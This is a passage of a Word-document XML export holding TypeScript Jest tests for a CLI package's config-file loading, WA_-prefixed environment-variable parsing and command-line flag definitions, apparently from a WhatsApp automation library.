        <w:t xml:space="preserve">        const arrayConfig = [{ name: 'item1' }, { name: 'item2' }];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        fs.writeFileSync(configPath, JSON.stringify(arrayConfig));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return undefined when we expect object but get array</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const resultAsObject = await tryOpenFileAsObject(configPath, false);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(resultAsObject).toBeUndefined();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return array when needArray is true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const resultAsArray = await tryOpenFileAsObject(configPath, true);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(resultAsArray).toBeDefined();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(Array.isArray(resultAsArray)).toBe(false); // Returns with confPath added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parse JSON5 with comments', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'json5.json');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const json5Content = `{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // This is a comment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    "sessionId": "json5-session",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    "port": 7777,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json5Content);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expect(result.sessionId).toBe('json5-session');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.port).toBe(7777);</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throw on malformed JSON', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'malformed.json');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        fs.writeFileSync(configPath, '{ invalid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The function throws a string, not an Error object</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            await expect(tryOpenFileAsObject(configPath)).rejects.toMatch(/Unable to parse config file/);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relative paths', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'relative.json');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const testConfig = { sessionId: 'relative-test' };</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        fs.writeFileSync(configPath, JSON.stringify(testConfig));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Get relative path from cwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const relativePath = path.relative(process.cwd(), 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tryOpenFileAsObject(relativePath);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expect(result.sessionId).toBe('relative-test');</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confPath in result', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'with-path.json');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        fs.writeFileSync(configPath, JSON.stringify({ test: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const result = await tryOpenFileAsObject(configPath);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expect(result.confPath).toBe(configPath);</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packages/legacy-documented/src/cli/__tests__/file-utils.test.ts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packages/legacy-documented/src/cli/__tests__/setup.test.ts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 Tests for packages/core/src/cli/setup.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * This test suite covers:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * 1. Config file discovery and loading (JSON, JS, async default export)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * 2. Environment variable parsing and precedence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * 3. CLI flags parsing (meow) and defaults</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * 4. Config merging precedence (CLI &gt; file &gt; env &gt; defaults)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * 5. Negative tests (malformed config, invalid JSON, missing files)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import * as path from 'path';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import * as fs from 'fs';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Store original env</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">const originalEnv = { ...process.env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Helper to create a clean module environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">const getIsolatedModule = async ()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 Re-import after reset to get fresh module state</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const setup = await import('../setup');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return setup;</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describe('CLI Setup Module',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 Restore env</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        process.env = { ...originalEnv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afterEach(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        process.env = { ...originalEnv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describe('envArgs()', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        it('should return empty object when no WA_ env vars are set', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            // Clear all WA_ vars</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            Object.keys(process.env)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                .filter(k =&gt; k.startsWith('WA'))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                .forEach(k =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    delete process.env[k];</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parse WA_ prefixed env vars and convert to camelCase', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            process.env.WA_SESSION_ID = 'test-session';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            process.env.WA_PORT = '8080';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expect(result.sessionId).toBe('test-session');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.port).toBe(8080); // Should be converted to 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convert "true"/"false" strings to booleans', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            process.env.WA_HEADLESS = 'true';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            process.env.WA_DEBUG = 'false';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            process.env.WA_VERBOSE = 'TRUE';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            process.env.WA_NO_API = 'FALSE';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expect(result.headless).toBe(true);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.debug).toBe(false);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.verbose).toBe(true);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.noApi).toBe(false);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numeric string conversion', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            process.env.WA_PORT = '3000';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            process.env.WA_QR_TIMEOUT = '60';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expect(result.port).toBe(3000);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.qrTimeout).toBe(60);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snake_case to camelCase conversion', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            process.env.WA_SESSION_ID = 'my-session';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            process.env.WA_LICENSE_KEY = 'my-key';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            process.env.WA_BROWSER_WS_ENDPOINT = 'ws://localhost:9222';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expect(result.sessionId).toBe('my-session');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.licenseKey).toBe('my-key');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.browserWsEndpoint).toBe('ws://localhost:9222');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describe('optionList exports', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        it('should export optionKeys array', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const { optionKeys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expect(Array.isArray(optionKeys)).toBe(true);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(optionKeys.length).toBeGreaterThan(0);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expected CLI options', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const { optionKeys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Check some key options are present</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(optionKeys).toContain('port');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(optionKeys).toContain('config');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(optionKeys).toContain('webhook');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(optionKeys).toContain('licenseKey');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export optionKeysWithDefaults', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const { optionKeysWithDefalts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expect(Array.isArray(optionKeysWithDefalts)).toBe(true);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(optionKeysWithDefalts).toContain('popup');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describe('meowFlags()', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        it('should return flags object for meow', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const { meowFlags } = await getIsolatedModule();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const flags = meowFlags();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expect(typeof flags).toBe('object');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(flags).not.toBeNull();</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port flag with correct type', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const { meowFlags } = await getIsolatedModule();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const flags = meowFlags();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expect(flags.port).toBeDefined();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(flags.port.type).toBe('number');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include config flag', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const { meowFlags } = await getIsolatedModule();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const flags = meowFlags();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expect(flags.config).toBeDefined();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(flags.config.type).toBe('string');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describe('cliOptionNames export', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        it('should export cliOptionNames mapping', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const { cliOptionNames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expect(typeof cliOptionNames).toBe('object');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describe('helptext export', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
